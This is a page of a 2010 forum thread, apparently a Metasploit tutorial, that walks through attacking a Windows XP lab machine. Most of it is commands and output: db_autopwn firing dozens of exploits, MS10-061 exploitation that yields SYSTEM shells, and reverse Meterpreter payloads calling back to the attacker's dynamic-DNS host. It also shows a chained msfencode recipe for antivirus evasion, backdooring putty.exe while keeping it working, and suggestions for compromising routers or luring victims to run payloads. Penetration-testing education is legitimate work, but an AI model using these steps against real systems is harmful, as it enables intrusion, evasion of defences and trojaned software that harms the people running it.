Page 2 of 2 FirstFirst 12
Results 11 to 17 of 17

Thread: My Metasploit tutorial thread

  1. #11
    Senior Member iproute's Avatar
    Join Date
    Jan 2010
    Location
    Midwest, USA
    Posts
    192

    Default Re: My Metasploit tutorial thread

    Code:
    msf > db_nmap -A 192.168.25.147
    
    Starting Nmap 5.35DC1 ( http://nmap.org ) at 2010-11-18 08:56 CST
    Nmap scan report for victim-30fe648f (192.168.25.147)
    Host is up (0.00074s latency).
    Not shown: 997 filtered ports
    PORT     STATE  SERVICE      VERSION
    139/tcp  open   netbios-ssn
    445/tcp  open   microsoft-ds Microsoft Windows XP microsoft-ds
    2869/tcp closed icslap
    MAC Address: 08:00:27:C1:63:8C (Cadmus Computer Systems)
    Device type: general purpose
    Running: Microsoft Windows XP
    OS details: Microsoft Windows XP SP3
    Network Distance: 1 hop
    Service Info: OS: Windows
    
    Host script results:
    |_nbstat: NetBIOS name: VICTIM-30FE648F, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:c1:63:8c (Cadmus Computer Systems)
    |_smbv2-enabled: Server doesn't support SMBv2 protocol
    | smb-os-discovery:  
    |   OS: Windows XP (Windows 2000 LAN Manager)
    |   Name: MSHOME\VICTIM-30FE648F
    |_  System time: 2010-11-18 08:56:26 UTC-8
    
    TRACEROUTE
    HOP RTT     ADDRESS
    1   0.74 ms victim-30fe648f (192.168.25.147)
    
    OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 52.71 seconds
    Then, we check it, and maybe take a look at the open services.
    Code:
    msf > db_hosts -c address,mac,name,state,updated_at,svcs,vulns
    
    Hosts
    =====
    
    address         mac                name             state  updated_at               svcs  vulns
    -------         ---                ----             -----  ----------               ----  -----
    192.168.25.147  08:00:27:C1:63:8C  victim-30fe648f  alive  2010-11-18 15:34:25 UTC  3     0
    
    msf > db_services 
    
    Services
    ========
    
    created_at               info                                name          port  proto  state   updated_at               Host            Workspace
    ----------               ----                                ----          ----  -----  -----   ----------               ----            ---------
    2010-11-18 15:34:26 UTC                                      netbios-ssn   139   tcp    open    2010-11-18 15:34:26 UTC  192.168.25.147  default
    2010-11-18 15:34:26 UTC  Microsoft Windows XP microsoft-ds   microsoft-ds  445   tcp    open    2010-11-18 15:34:26 UTC  192.168.25.147  default
    2010-11-18 15:34:26 UTC                                      icslap        2869  tcp    closed  2010-11-18 15:34:26 UTC  192.168.25.147  default
    We'll go ahead and run our db_autopwn now.
    Code:
    msf > db_autopwn -h[*] Usage: db_autopwn [options]
    	-h          Display this help text
    	-t          Show all matching exploit modules
    	-x          Select modules based on vulnerability references
    	-p          Select modules based on open ports
    	-e          Launch exploits against all matched targets
    	-r          Use a reverse connect shell
    	-b          Use a bind shell on a random port (default)
    	-q          Disable exploit module output
    	-R  [rank]  Only run modules with a minimal rank
    	-I  [range] Only exploit hosts inside this range
    	-X  [range] Always exclude hosts inside this range
    	-PI [range] Only exploit hosts with these ports open
    	-PX [range] Always exclude hosts with these ports open
    	-m  [regex] Only run modules whose name matches the regex
    	-T  [secs]  Maximum runtime for any exploit in seconds
    
    msf > db_autopwn -p -r -e
    [*] (1/50 [0 sessions]): Launching exploit/freebsd/samba/trans2open against 192.168.25.147:139...
    [*] (2/50 [0 sessions]): Launching exploit/linux/samba/chain_reply against 192.168.25.147:139...
    [*] (3/50 [0 sessions]): Launching exploit/linux/samba/lsa_transnames_heap against 192.168.25.147:139...
    [*] (4/50 [0 sessions]): Launching exploit/linux/samba/trans2open against 192.168.25.147:139...
    [*] (5/50 [0 sessions]): Launching exploit/multi/samba/nttrans against 192.168.25.147:139...
    [*] (6/50 [0 sessions]): Launching exploit/multi/samba/usermap_script against 192.168.25.147:139...
    [*] (7/50 [0 sessions]): Launching exploit/netware/smb/lsass_cifs against 192.168.25.147:139...
    [*] (8/50 [0 sessions]): Launching exploit/osx/samba/lsa_transnames_heap against 192.168.25.147:139...
    [*] (9/50 [0 sessions]): Launching exploit/solaris/samba/trans2open against 192.168.25.147:139...
    [*] (10/50 [0 sessions]): Launching exploit/windows/brightstor/ca_arcserve_342 against 192.168.25.147:139...
    [*] (11/50 [0 sessions]): Launching exploit/windows/brightstor/etrust_itm_alert against 192.168.25.147:139...
    [*] (12/50 [0 sessions]): Launching exploit/windows/smb/ms03_049_netapi against 192.168.25.147:139...
    [*] (13/50 [0 sessions]): Launching exploit/windows/smb/ms04_011_lsass against 192.168.25.147:139...
    [*] (14/50 [0 sessions]): Launching exploit/windows/smb/ms04_031_netdde against 192.168.25.147:139...
    [*] (15/50 [0 sessions]): Launching exploit/windows/smb/ms05_039_pnp against 192.168.25.147:139...
    [*] (16/50 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 192.168.25.147:139...
    [*] (17/50 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwapi against 192.168.25.147:139...
    [*] (18/50 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwwks against 192.168.25.147:139...
    [*] (19/50 [0 sessions]): Launching exploit/windows/smb/ms06_070_wkssvc against 192.168.25.147:139...
    [*] (20/50 [0 sessions]): Launching exploit/windows/smb/ms07_029_msdns_zonename against 192.168.25.147:139...
    [*] (21/50 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.25.147:139...
    [*] (22/50 [0 sessions]): Launching exploit/windows/smb/ms10_061_spoolss against 192.168.25.147:139...
    [*] (23/50 [0 sessions]): Launching exploit/windows/smb/netidentity_xtierrpcpipe against 192.168.25.147:139...
    [*] (24/50 [0 sessions]): Launching exploit/windows/smb/psexec against 192.168.25.147:139...
    [*] (25/50 [0 sessions]): Launching exploit/windows/smb/timbuktu_plughntcommand_bof against 192.168.25.147:139...
    [*] (26/50 [0 sessions]): Launching exploit/freebsd/samba/trans2open against 192.168.25.147:445...
    [*] (27/50 [0 sessions]): Launching exploit/linux/samba/chain_reply against 192.168.25.147:445...
    [*] (28/50 [0 sessions]): Launching exploit/linux/samba/lsa_transnames_heap against 192.168.25.147:445...
    [*] (29/50 [0 sessions]): Launching exploit/linux/samba/trans2open against 192.168.25.147:445...
    [*] (30/50 [0 sessions]): Launching exploit/multi/samba/nttrans against 192.168.25.147:445...
    [*] (31/50 [0 sessions]): Launching exploit/multi/samba/usermap_script against 192.168.25.147:445...
    [*] (32/50 [0 sessions]): Launching exploit/netware/smb/lsass_cifs against 192.168.25.147:445...
    [*] (33/50 [0 sessions]): Launching exploit/osx/samba/lsa_transnames_heap against 192.168.25.147:445...
    [*] (34/50 [0 sessions]): Launching exploit/solaris/samba/trans2open against 192.168.25.147:445...
    [*] (35/50 [0 sessions]): Launching exploit/windows/brightstor/ca_arcserve_342 against 192.168.25.147:445...
    [*] (36/50 [0 sessions]): Launching exploit/windows/brightstor/etrust_itm_alert against 192.168.25.147:445...
    [*] (37/50 [0 sessions]): Launching exploit/windows/smb/ms03_049_netapi against 192.168.25.147:445...
    [*] (38/50 [0 sessions]): Launching exploit/windows/smb/ms04_011_lsass against 192.168.25.147:445...
    [*] (39/50 [0 sessions]): Launching exploit/windows/smb/ms04_031_netdde against 192.168.25.147:445...
    [*] (40/50 [0 sessions]): Launching exploit/windows/smb/ms05_039_pnp against 192.168.25.147:445...
    [*] (41/50 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 192.168.25.147:445...
    [*] (42/50 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwapi against 192.168.25.147:445...
    [*] (43/50 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwwks against 192.168.25.147:445...
    [*] (44/50 [0 sessions]): Launching exploit/windows/smb/ms06_070_wkssvc against 192.168.25.147:445...
    [*] (45/50 [0 sessions]): Launching exploit/windows/smb/ms07_029_msdns_zonename against 192.168.25.147:445...
    [*] (46/50 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.25.147:445...
    [*] (47/50 [0 sessions]): Launching exploit/windows/smb/ms10_061_spoolss against 192.168.25.147:445...
    [*] (48/50 [0 sessions]): Launching exploit/windows/smb/netidentity_xtierrpcpipe against 192.168.25.147:445...
    [*] (49/50 [0 sessions]): Launching exploit/windows/smb/psexec against 192.168.25.147:445...
    [*] (50/50 [0 sessions]): Launching exploit/windows/smb/timbuktu_plughntcommand_bof against 192.168.25.147:445...
    [*] (50/50 [0 sessions]): Waiting on 23 launched modules to finish execution...
    [*] (50/50 [1 sessions]): Waiting on 13 launched modules to finish execution...
    [*] Meterpreter session 1 opened (192.168.25.133:5503 -> 192.168.25.147:1034) at 2010-11-18 08:58:58 -0600
    [*] (50/50 [1 sessions]): Waiting on 12 launched modules to finish execution...
    [*] Meterpreter session 2 opened (192.168.25.133:23683 -> 192.168.25.147:1035) at 2010-11-18 08:59:02 -0600
    [*] (50/50 [2 sessions]): Waiting on 11 launched modules to finish execution...
    [*] (50/50 [2 sessions]): Waiting on 8 launched modules to finish execution...
    [*] Meterpreter session 4 opened (192.168.25.133:14963 -> 192.168.25.147:1038) at 2010-11-18 09:00:05 -0600
    [*] Meterpreter session 3 opened (192.168.25.133:8853 -> 192.168.25.147:1037) at 2010-11-18 09:00:05 -0600
    [*] (50/50 [4 sessions]): Waiting on 6 launched modules to finish execution...
    [*] (50/50 [4 sessions]): Waiting on 5 launched modules to finish execution...
    [*] (50/50 [4 sessions]): Waiting on 4 launched modules to finish execution...
    [*] (50/50 [4 sessions]): Waiting on 3 launched modules to finish execution...
    [*] (50/50 [4 sessions]): Waiting on 1 launched modules to finish execution...
    [*] (50/50 [4 sessions]): Waiting on 0 launched modules to finish execution...
    ..continued..

  2. #12
    Senior Member iproute's Avatar
    Join Date
    Jan 2010
    Location
    Midwest, USA
    Posts
    192

    Default Re: My Metasploit tutorial thread

    ok, now we're run our db_autopwn and managed to snag some sessions. Lets look at what hosts were exploited, and which exploits worked. I'm going to show a few methods to achieve this.
    Code:
    msf > db_vulns 
    [*] Time: 2010-11-18 15:57:36 UTC Vuln: host=192.168.25.147 name=exploit/windows/smb/ms08_067_netapi refs=CVE-2008-4250,OSVDB-49243,MSB-MS08-067,NEXPOSE-dcerpc-ms-netapi-netpathcanonicalize-dos
    [*] Time: 2010-11-18 15:58:05 UTC Vuln: host=192.168.25.147 name=exploit/windows/smb/ms10_061_spoolss refs=OSVDB-67988,CVE-2010-2729,MSB-MS10-061
    msf > db_exploited 
    [*]Time: 2010-11-18 15:57:38 UTC Host Info: host=192.168.25.147 port=139 proto=tcp sname=netbios-ssn exploit=exploit/windows/smb/ms08_067_netapi
    [*] Time: 2010-11-18 15:57:41 UTC Host Info: host=192.168.25.147 port=445 proto=tcp sname=microsoft-ds exploit=exploit/windows/smb/ms08_067_netapi
    [*] Time: 2010-11-18 15:58:05 UTC Host Info: host=192.168.25.147 port=445 proto=tcp sname=microsoft-ds exploit=exploit/windows/smb/ms10_061_spoolss
    [*] Time: 2010-11-18 15:58:06 UTC Host Info: host=192.168.25.147 port=139 proto=tcp sname=netbios-ssn exploit=exploit/windows/smb/ms10_061_spoolss
    [*] Found 4 exploited hosts.
    msf > sessions -v
    
    Active sessions
    ===============
    
      Id  Type                   Information                            Connection                                   Via
      --  ----                   -----------                            ----------                                   ---
      1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ VICTIM-30FE648F  192.168.25.133:11425 -> 192.168.25.147:1039  exploit/windows/smb/ms08_067_netapi
      2   meterpreter x86/win32                                         192.168.25.133:32002 -> 192.168.25.147:1040  exploit/windows/smb/ms08_067_netapi
      3   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ VICTIM-30FE648F  192.168.25.133:15606 -> 192.168.25.147:1042  exploit/windows/smb/ms10_061_spoolss
      4   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ VICTIM-30FE648F  192.168.25.133:11361 -> 192.168.25.147:1043  exploit/windows/smb/ms10_061_spoolss
    You should even be able to run scripts on multiple sessions with the following;
    in this example we'll use checkvm. I wasnt able to get all sessions to run some scripts, so I will not be including the output in this case. Perhaps a better idea would be to use setg with an initialautorunscript setting.
    Code:
    msf > sessions -s checkvm all
    I think that should cover most of the basics for db_autopwn. It's quite handy and entertaining to mess around with. I also recommend checking out Rel1k's fast-track tool.

    I have recorded a short demo video of some commands and will be uploading shortly.

    EDIT:
    Here is my quick db_autopwn vid
    I am still working on optimal settings to use for the recordings and also my video editing skills. These are in real time so there might be a couple of points where you'd want to skip ahead a bit.
    Last edited by iproute; 11-18-2010 at 05:52 PM.

  3. #13
    Senior Member iproute's Avatar
    Join Date
    Jan 2010
    Location
    Midwest, USA
    Posts
    192

    Default Re: My Metasploit tutorial thread

    One thing I believe needs to be mentioned that I neglected previously with db_autopwn; Without first performing a vulnerability scan such as with nessus, db_autopwn running against matched ports will run far too many exploits that are not compatible with the platform/target.
    In the previous example we can see we are running linux exploits against a windows box.

    msf > db_autopwn -p -r -e
    [*] (1/50 [0 sessions]): Launching exploit/freebsd/samba/trans2open against 192.168.25.147:139...

    [*] (2/50 [0 sessions]): Launching exploit/linux/samba/chain_reply against 192.168.25.147:139...

    [*] (3/50 [0 sessions]): Launching exploit/linux/samba/lsa_transnames_heap against 192.168.25.147:139...

    [*] (4/50 [0 sessions]): Launching exploit/linux/samba/trans2open against 192.168.25.147:139...

    [*] (5/50 [0 sessions]): Launching exploit/multi/samba/nttrans against 192.168.25.147:139...

    [*] (6/50 [0 sessions]): Launching exploit/multi/samba/usermap_script against 192.168.25.147:139...

    [*] (7/50 [0 sessions]): Launching exploit/netware/smb/lsass_cifs against 192.168.25.147:139...

    [*] (8/50 [0 sessions]): Launching exploit/osx/samba/lsa_transnames_heap against 192.168.25.147:139...

    [*] (9/50 [0 sessions]): Launching exploit/solaris/samba/trans2open against 192.168.25.147:139...
    This can easily be remedied with the -m flag. -m uses regular expressions to narrow the list. Yes we could import a nessus scan which is great, but the -m option is a solution that will take very little time.
    Code:
    msf > db_autopwn -p -r -e -m windows
    results in 18 less exploits to run that are not needed, making the process faster.
    Much nicer...
    Last edited by iproute; 11-29-2010 at 09:54 PM.

  4. #14
    Just burned his ISO
    Join Date
    Aug 2010
    Posts
    15

    Default Re: My Metasploit tutorial thread

    Quote Originally Posted by iproute View Post
    I'll give some info on my take on it in another post when I've got more time, but I'm definitey not an expert. Might be good to get in touch with vivek and find out if there are any further presentations planned. From elsewhere on the internet it looks like he is pretty good about responding.



    On another note, one of the things I feel I've missed above links wise is
    IHS*|*Home of Johnny Long and Hackers for Charity, Inc
    Please at least take a look at some of the cool stuff Johnny Long is doing.
    About the firewall bypass, check out FWB++ at Megapanzer FWB++. Currently the binary just connects to the megapanzer RATs webpage but since the source is provided we can change the link to our ip i guess.

    Did anyone have any success by using meterpreter egress buster or reverse DNS?

  5. #15
    Senior Member iproute's Avatar
    Join Date
    Jan 2010
    Location
    Midwest, USA
    Posts
    192

    Default Re: My Metasploit tutorial thread

    Here is my take on firewall bypass. Again, I am no expert.

    For local firewall bypass(windows firewall) I'd be assuming you're on the same subnet as the victim machine, but the local firewall is preventing bind_tcp payloads. Of course in this instance we would just use a reverse_tcp payload.

    For NAT traversal/bypass we can assume you would not be on the same subnet as the victim machine. In which case you might hope for open ports of some kind. If the victim machine is totally inaccessible through the NAT, then I might be thinking about using a social engineering attack with a reverse_tcp_dns payload, and point it back to myself with my no-ip hostname or some such. Granted you would need some mechanism to deliver your crafted payload, such as email or SMS, and would also of course need to know WHERE to send it. Hopefully enough time has been spent on the information gathering/enumeration phase of the pentest.
    Or you could consider attacking the network equipment first. Suppose you could comprise the router first. Well now you have the keys to the kingdom. maybe modify the DHCP server so that it is handing out your IP as a DNS server, and direct people wherever we like. Some routers can set specific records for specific websites such as 2wire equipment. Maybe the router is capable of a VPN setup that could place us on the same inside subnet as our victim machine(this is Pivoting) and then all we'd have to deal with is the local firewall of the victim machine.

    Another thing to keep in mind with a corporate network scenario. There is often a proxy server limiting outbound traffic making the reverse_tcp and or reverse_tcp_dns payloads more difficult to utilize. The one at my work for instance limits everything except 80, 443, 22 and a few others. Things that we would definitely be using in our jobs. Because of these common proxy configurations I like to set my reverse_tcp or reverse_tcp_dns payloads to 443 or another port that is commonly open for users.

    Now there is a very interesting payload in the framework now, that might be very useful for this situation. I have never used it myself, however here is the info from it.
    Code:
    msf > info windows/meterpreter/reverse_tcp_allports 
    
           Name: Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
        Version: 10394, 8998, 8984
       Platform: Windows
           Arch: x86
    Needs Admin: No
     Total size: 294
           Rank: Normal
    
    Provided by:
      skape <mmiller@hick.org>
      sf <stephen_fewer@harmonysecurity.com>
      hdm <hdm@metasploit.com>
    
    Basic options:
    Name      Current Setting  Required  Description
    ----      ---------------  --------  -----------
    EXITFUNC  process          yes       Exit technique: seh, thread, process, none
    LHOST                      yes       The listen address
    LPORT     1                yes       The starting port number to connect back on
    
    Description:
      Try to connect back to the attacker, on all possible ports (1-65535, 
      slowly), Inject the meterpreter server DLL via the Reflective Dll 
      Injection payload (staged)
    Regard A/V Bypass, I strongly recommend that interested parties do some reading on this forum. There is a lot of information just in the HowTo section here. Of course we'll need to use encoding. Encoding can be set inside of the exploit module or if you are generating a payload with msfpayload, you can pipe it through msfencode, even multiple times like this;
    Code:
    root@bt4:~# msfpayload windows/meterpreter/reverse_tcp_dns LHOST=my.no-
    ip-hostname.com LPORT=443 R | msfencode -e x86/fnstenv_mov -c 2 -t raw | 
    msfencode -e x86/countdown -c 3 -t raw | msfencode -e x86/call4_dword_xor -c 1 -t
     raw | msfencode -t raw | msfencode -e x86/shikata_ga_nai -c 4 -t exe > 
    /root/payload.exe
    Don't forget you can use/backdoor an existing exe(some will not work. Experimentation is key) as a template with -x. You can even keep the template working with -k so when they run the payload exe, their expected program starts up just fine. Remember to use the -o option with these for your output file rather than redirecting the output. You can also set things up with
    Code:
    root@bt4:~# msfpayload windows/meterpreter/reverse_tcp_dns LHOST=my.no-
    ip-hostname.com LPORT=443 EXITFUNC=thread R | msfenco......etc...
    which will keep your meterpreter/payload process alive even when they close the backdoored executable.

    There is also more than one way to generate payloads. You can do so within the framework. here is how
    Code:
    msf > use windows/meterpreter/reverse_tcp_dns
    msf payload(reverse_tcp_dns) > set lhost your-noip-hostname.com
    lhost => your-noip-hostname.com
    msf payload(reverse_tcp_dns) > set lport 443
    lport => 443
    msf payload(reverse_tcp_dns) > set exitfunc thread
    exitfunc => thread
    msf payload(reverse_tcp_dns) > generate -h
    Usage: generate [options]
    
    Generates a payload.
    
    OPTIONS:
    
        -E        Force encoding.
        -b <opt>  The list of characters to avoid: '\x00\xff'
        -e <opt>  The name of the encoder module to use.
        -f <opt>  The output file name (otherwise stdout)
        -h        Help banner.
        -i <opt>  the number of encoding iterations.
        -k        Keep the template executable functional
        -o <opt>  A comma separated list of options in VAR=VAL format.
        -p <opt>  The Platform for output.
        -s <opt>  NOP sled length.
        -t <opt>  The output format: raw,ruby,rb,perl,pl,c,js_be,js_le,java,dll,exe,exe-small,elf,macho,vba,vbs,loop-vbs,asp,war
        -x <opt>  The executable template to use
    
    msf payload(reverse_tcp_dns) > generate -e x86/shikata_ga_nai -i 3 -t exe -x /root/putty.exe -k -f /root/payload.exe
    If you do not use the -t option it will generate shellcode by default. Bear in mind, staged payloads such as meterpreter will output shellcode for both stages.
    Last edited by iproute; 12-07-2010 at 10:29 PM.

  6. #16
    Senior Member iproute's Avatar
    Join Date
    Jan 2010
    Location
    Midwest, USA
    Posts
    192

    Default Re: My Metasploit tutorial thread

    Here I'm going to mention resource files briefly. Specifically I would like to address the default resource file. I will demonstrate regular resource file usage when I have more time, but here is a cool bit.

    Using the default msf resource file you can set certain commands to run on console startup. Perhaps we would like to have our postgres database autoconnect when we start things up.

    Code:
    root@bt:~# nano .msf3/msfconsole.rc
    Go ahead and enter the commands you would like to run on startup. You can even do things like calling other resource files.
    Code:
    db_connect postgres:password@127.0.0.1/metasploit
    db_status
    Then when starting the framework it should look something like this;
    Code:
    root@bt:~# msfconsole
    
                    _                  _       _ _
                   | |                | |     (_) |
     _ __ ___   ___| |_ __ _ ___ _ __ | | ___  _| |_
    | '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
    | | | | | |  __/ || (_| \__ \ |_) | | (_) | | |_
    |_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
                                | |
                                |_|
    
    
           =[ metasploit v3.5.1-dev [core:3.5 api:1.0]
    + -- --=[ 633 exploits - 312 auxiliary
    + -- --=[ 215 payloads - 27 encoders - 8 nops
           =[ svn r11229 updated today (2010.12.05)
    
    resource (/root/.msf3/msfconsole.rc)> db_connect postgres:password@127.0.0.1/metasploit
    resource (/root/.msf3/msfconsole.rc)> db_status
    [*] postgresql connected to metasploit
    msf >
    Here I will show making msfconsole into an instant shell. We will call a resource file from the default msfconsole.rc file.
    This is a resource file I made with the makerc command in the framework.
    Code:
    root@bt:~# cat spoolss.rc
    use windows/smb/ms10_061_spoolss
    set rhost 192.168.25.147
    set payload windows/shell/reverse_tcp
    set lhost 192.168.25.106
    set lport 5566
    exploit
    And here is what I added to my msfconsole.rc file
    Code:
    root@bt:~# cat .msf3/msfconsole.rc
    db_connect postgres:severus@127.0.0.1/metasploit
    db_status
    resource spoolss.rc
    which results in
    Code:
    root@bt:~# msfconsole
    
                     o                       8         o   o
                     8                       8             8
    ooYoYo. .oPYo.  o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8  o8P
    8' 8  8 8oooo8   8  .oooo8 Yb..   8    8 8 8    8  8   8
    8  8  8 8.       8  8    8   'Yb. 8    8 8 8    8  8   8
    8  8  8 `Yooo'   8  `YooP8 `YooP' 8YooP' 8 `YooP'  8   8
    ..:..:..:.....:::..::.....::.....:8.....:..:.....::..::..:
    ::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::
    ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
    
    
           =[ metasploit v3.5.1-dev [core:3.5 api:1.0]
    + -- --=[ 633 exploits - 312 auxiliary
    + -- --=[ 215 payloads - 27 encoders - 8 nops
           =[ svn r11229 updated today (2010.12.05)
    
    resource (/root/.msf3/msfconsole.rc)> db_connect postgres:severus@127.0.0.1/meta
    sploit
    resource (/root/.msf3/msfconsole.rc)> db_status[*] postgresql connected to metasploit
    resource (/root/.msf3/msfconsole.rc)> resource spoolss.rc
    resource (spoolss.rc)> use windows/smb/ms10_061_spoolss
    resource (spoolss.rc)> set rhost 192.168.25.147
    rhost => 192.168.25.147
    resource (spoolss.rc)> set payload windows/shell/reverse_tcp
    payload => windows/shell/reverse_tcp
    resource (spoolss.rc)> set lhost 192.168.25.106
    lhost => 192.168.25.106
    resource (spoolss.rc)> set lport 5566
    lport => 5566
    resource (spoolss.rc)> exploit
    [*] Started reverse handler on 192.168.25.106:5566
    [*] Trying target Windows Universal...
    [*] Binding to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:192.168.25.147[
    \spoolss] ...
    [*] Bound to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:192.168.25.147[\s
    poolss] ...
    [*] Attempting to exploit MS10-061 via \\192.168.25.147\Lexmark1 ...
    [*] Printer handle: 0000000092e4d269f911344c9b69d159ed732a4e
    [*] Job started: 0x4
    [*] Wrote 73802 bytes to %SystemRoot%\system32\7FnILYxzIVvGR1.exe
    [*] Job started: 0x5
    [*] Wrote bind request for \\192.168.25.147\PIPE\ATSVC (72 bytes)
    [*] Wrote 96 bytes of NetrAddJob request
    [*] Everything should be set, waiting up to two minutes for a session...
    [*] Sending stage (240 bytes) to 192.168.25.147
    [*] Command shell session 1 opened (192.168.25.106:5566 -> 192.168.25.147:1036)
    at Sun Dec 05 20:09:00 -0600 2010
    
    
    
    C:\WINDOWS\system32>
    An alternative of course to including the spoolss.rc in the default resource file is to just start the console with the -r flag such as;
    Code:
    root@bt:~# msfconsole -r spoolss.rc

    I am using a windows/shell payload for simplicity and speed in this case. Also this brief bit on resource files is simply designed to illustrate some of the methodology that can be used.
    Last edited by iproute; 12-07-2010 at 05:28 AM.

  7. #17
    Senior Member iproute's Avatar
    Join Date
    Jan 2010
    Location
    Midwest, USA
    Posts
    192

    Default Re: My Metasploit tutorial thread

    Make sure you pay attention to the Metasploit Framework Unleashed course that is available. It does see updates that coincide with the framework development and always has top quality. I was not previously aware of the Armitage GUI available for the framework until recently by checking out MSFU again. I was very impressed once I got it working correctly. Had some database issues that I believe should be isolated to myself.

    The reference for this GUI tool is here in the MSFU course, Chaper 13 - Beyond Metasploit.
    The Armitage homepage is here and has a very good manual, as well as a media section with some howto videos. It is very easy to setup and use. BT4R2 should already have your databases ready to go. I used postgres rather than mysql in this case

    I used
    Code:
    root@bt:~# apt-get update
    root@bt:~# apt-get install armitage
    root@bt:~# /etc/init.d/postgresql-8.3 start
    root@bt:~# msfrpcd -U msf -P test -t Basic &
    root@bt:~# cd /pentest/exploits/armitage/
    root@bt:/pentest/exploits/armitage# ./armitage.sh
    Then I set the DB Driver to postgres in the drop down menu, checked SSL(if it wasn't already) and used the DB connect string;
    Code:
    postgres:password@127.0.0.1/armitage
    So far, from what I've used of it, this GUI is quite fast and effective at simplifying many metasploit tasks. Pass the hash and pivoting look to have been made very very simple. I definitely recommend at least checking it out. Even though I generally perfer CLI, I do like this GUI.
    Last edited by iproute; 01-06-2011 at 03:28 PM.

Page 2 of 2 FirstFirst 12

Similar Threads

  1. [Tutorial] Curso Metasploit Framework (traduzido)
    By rafaeltorresrj in forum Tutoriais e Howtos
    Replies: 8
    Last Post: 08-08-2010, 01:42 AM
  2. Metasploit auxilary file_autopwn module - Video Tutorial
    By brtw2003 in forum BackTrack Videos
    Replies: 5
    Last Post: 03-13-2010, 11:20 AM
  3. Tutorial Request Thread
    By KMDave in forum Tutorials und Howtos
    Replies: 20
    Last Post: 01-20-2010, 03:04 AM
  4. Metasploit problem with getting a tutorial to work
    By sertas in forum OLD BackTrack 4 General Support
    Replies: 1
    Last Post: 07-18-2009, 01:03 PM
  5. Metasploit 3 tutorial for beginner?
    By LLO6969 in forum OLD Newbie Area
    Replies: 2
    Last Post: 01-13-2008, 10:48 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •